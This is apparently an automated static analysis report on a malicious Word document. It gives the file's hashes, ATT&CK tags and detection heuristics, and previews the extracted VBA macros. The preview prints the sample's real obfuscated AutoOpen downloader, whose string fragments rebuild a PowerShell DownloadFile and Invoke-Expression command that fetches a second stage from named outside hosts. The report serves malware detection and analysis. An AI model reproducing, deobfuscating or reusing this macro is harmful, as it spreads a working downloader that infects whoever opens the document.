Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bcf0203316eb837e…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 294.0 KB
Created: 2017-12-06 15:28:00
Authoring application: Microsoft Office Word
First seen: 2017-12-09
MD5: ef84a6845ead2a7861b322358e3ac974
SHA-1: e2c1abce79738fd119d19ff6393ee024b1c27b1e
SHA-256: bcf0203316eb837e48be3dc38592cf56f905b0b2e34d9a20196c633d10ccf9b0
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro, flagged by multiple heuristics, calls the Shell() function to execute a command. The macro reassembles the URL 'http://www.4chaou.com/modules/Ahku8BM/' from obfuscated string fragments (UCase/Mid slices of padded literals); the URL is most likely used to fetch and execute a second-stage payload. This is a macro-based downloader pattern.

Heuristics (7)

  • ClamAV: Doc.Macro.Obfuscation-6394109-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.u0DIP+DIPT+u0Txu0T+u0Tn--- (in document text, OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 49898 bytes
SHA-256: b243cfed6805dc23a8c7be069d5fa4a029efe990461ec59ddf07fc299c84e6a1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ZrWFZaFkQoYEA"
Function iAXTUiz()
JEUAPdRjq = Array(UCase("dhiLEUQXpwLw" + "vUGbbWcnscflm" + "wNWOnjSUJ" + "VcdzWIDsMMXv" + "UpNqzkECZRAR"))
HcnqYpScV = Mid("GJNW5zfPfS80Tb'+'tbcfkecv2kDIP+DIPf1au0'+'T+u0T.xn-u0T+u0T-p1ai/eq/u'+'0T+u0TKdbu0T+u0T.Split(Kdb,Kdb);Geykarapu'+'0T+u0Tasu0T+u0T = u0T+u0TGeynsadau0T+u0Tsdu0T+u0MGYwRX0", 12, 152)
htmtDlpPona = Array(UCase("nHBLbQDYFKS" + "LRHwGidHdj" + "wsLXIHUrhqijws" + "OGSfYwDzqRjj" + "PuzCDKFTQsvQkS"))
WEfamuQkC = Array(UCase("SjXRZbKX" + "ztcQkYn" + "ZvCbCYZpVk" + "jvKchNq" + "VumwkOOqUN"))
EwZLS = Array(UCase("YFCESiFawWE" + "wUdisAQ" + "jYPWscXU" + "uLEunohfAJKfwU" + "NRVKwifSRw"))
qOGZFSkFw = Mid("JPP8+[chDIP+DIPAR]102+DIP+DIP[cDIP+'+'DIPhAR]83),['+'STrIng][chAR]92)aDYINVOke-ExpDIP+DIPRESS0iY9itomVLfTIqH", 3, 91)
HHCXrLNOiwW = Array(UCase("zfPArFOhQLzc" + "rFqJoQv" + "uESinzS" + "nhFcokZRu" + "XSfZIXSiF"))
WoKJK = Array(UCase("AqfLpGkiCKzLJj" + "wrqGbiDqIaHMYS" + "tnwporzpT" + "uTSNNFM" + "AfobLWPwzXk"))
LWpMSEH = Array(UCase("NwkptzKXwl" + "wGHjtiCvaHnNTl" + "hWwozwujQz" + "AwmmIoTOq" + "CpjklQNRalRET"))
ajQpDOvzd = Mid("jF16DkmZ+u0TDIP+DIPbcd = KdDIP+DIPu0T+u0Tbhttpu0T+u0T'+'s:/'+'/u0T+u0Tww'+'w.DIP+DIP4chDIP+DIPoau0T+u0T.cDIP+DIPoDIP+DIPmu0T+u0T/u0T+u0Tmu0T+u0Todules/u0T+u0TAu0T+u0Thku0T+u0T8BM/,httpu0jhP3wiL7FAJP0Vp", 9, 178)
ZYAtzAJ = Array(UCase("uLLnQMPTsDzC" + "DhOlduVuiX" + "aSbZassbElJiI" + "wBqsmzjmEIo" + "KWdPnMo"))
wjZAZbdd = Array(UCase("oYJnzEWri" + "iDInwztFujf" + "PDMjjSqMzvf" + "zkijRlWKHH" + "hHZSasM"))
NqCcAMi = Array(UCase("EFfYAdRjBJzs" + "ElCqzjFAo" + "InvrKodZUEXvJo" + "kOQGYOHHw" + "XhnadNiQJ"))
UjQMGbthcq = Mid("OH4V0JctItem(Geyhr3fQqhKY", 9, 9)
sQscrmUpjm = Array(UCase("nmIJGbQX" + "BWdiYoq" + "UNnJJUZHw" + "YGAPTnlripa" + "EAOSJkdXJT"))
vzZuNSUi = Array(UCase("kFlGuXjcnt" + "bObMRouP" + "AfwdmGqzrrof" + "RiidJLA" + "fUDFwTMNLYo"))
COPmhMoNY = Array(UCase("MjdADwFiFzBAW" + "TpLvIbnz" + "VQNFIYusAvjKlM" + "PvotsfTVtV" + "EurQZFP"))
FuwsKzuViM = Mid("Aauj5ukIonDIP).repLace(DIPaDYDIP,[STrINg][char]124).repLace(([char]117'+'+[ch'+'ar]48+[ch'+'ar]84),[STrINonzkkEA3luvki7OnuDc4Zb", 8, 98)
wzfpPqTKhb = Array(UCase("bVEHHTo" + "klwFcbwwhofi" + "CVLuYqndl" + "SAfZvZXVqXT" + "uXzdUWQfXtFmYA"))
bMqrTdTKcm = Array(UCase("HjpszFKEBFqAh" + "ofMmtFPCvUk" + "TABkVav" + "FnZDrnhbSPDVWc" + "LDnMJZE"))
DBquwczpmoZ = Array(UCase("LvPMkBBTNVBBO" + "EAPjzdwvkpjmpI" + "mjqzBnFILRimzY" + "EFfzBlVkIbuP" + "adzMtTbo"))
stGQCdUdQaI = Mid("pfZ18fk1wLobQoXvnjLzWnbrg][char]39)'+MYu6j", 25, 13)
hhoZdj = Array(UCase("VIsmJCQkPEkWA" + "JuFYokf" + "OhqupjiOl" + "AzEuwBXYBf" + "QlGFGusGllUIE"))
MLEGLihJJFs = Array(UCase("BMHwsDSV" + "BWzldGrGOQwiY" + "XviiTRtd" + "vtESpDsSSmlttK" + "zrUmFKsccFkDJ"))
QipvwzkVTno = Array(UCase("HpAlAawawD" + "AJMwrKdwJZiX" + "aoklUzfSLwbzV" + "GWacVjzMFUrA" + "qUbwcSLLMqNGzX"))
PnjaOLFLZsE = Mid("wbBfYO3mfXlGnbsV6IP+DIPu0Tyfru0T'+'+u0Tanc.Downloau0T+u0Tdu0'+'T+u0TFileu0T+u'+'0T(u'+'0T+u0TGeyabc.u'+'0T+u0TTu0T+usE53miL", 18, 99)
XCTnfcf = Array(UCase("wEwYZErZnC" + "VzdvmNi" + "tjczGXnDRbNF" + "izUioVUGzZDSjj" + "OhqsFTQl"))
YoaDuUm = Array(UCase("oKlwWcWZiw" + "rqOiPtTE" + "wjBzjJWujNWYI" + "XujsiTTvtAT" + "VzdaUmthWFJ"))
FKsXrmZdzfV = Array(UCase("GYCiZYXf" + "SZwMhSb" + "ZnXPnDdr" + "sjiQwmikA" + "mKuYkfSwiJAr"))
dwSmdf = Mid("Dmuxtu0'+'T+u0T(1,u0T+u0T 3u0T+u0T4324u0T+u0T5);Geyhuu0T+u0Tau0T+u0Ts u0T+u0T= Gu0T+u0Teu0T+u0Tyeu0'+'T+BowiSM6fBj", 4, 101)
dJazSIHL = Array(UCase("SMFcsVZkiNqo" + "ApkWCqAfFoYQ" + "tkfaHSl" + "aRNqCYbjsHGptT" + "ILTOIGMYjMmbpE"))
dwAffvndOL = Array(UCase("kaCBhsSUZ" + "LfqBkWnRbjjoB" + "OmjVHuhNBRt" + "tkzrhNNTjtudi" + "vrYKiwYXmuJ"))
RVoDQfXkcfQ = Array(UCase("GESBOWtYJEX" + "wjGTAiidatjA" + "YTBqcdjLLrn" + "nzlaSSM" + "UMwZAIHHhCN"))
NYwEZZ = Mid("JqO1n6YUzOf7I8LcRjtF8GPDIP+DIP0ToStu'
... (truncated)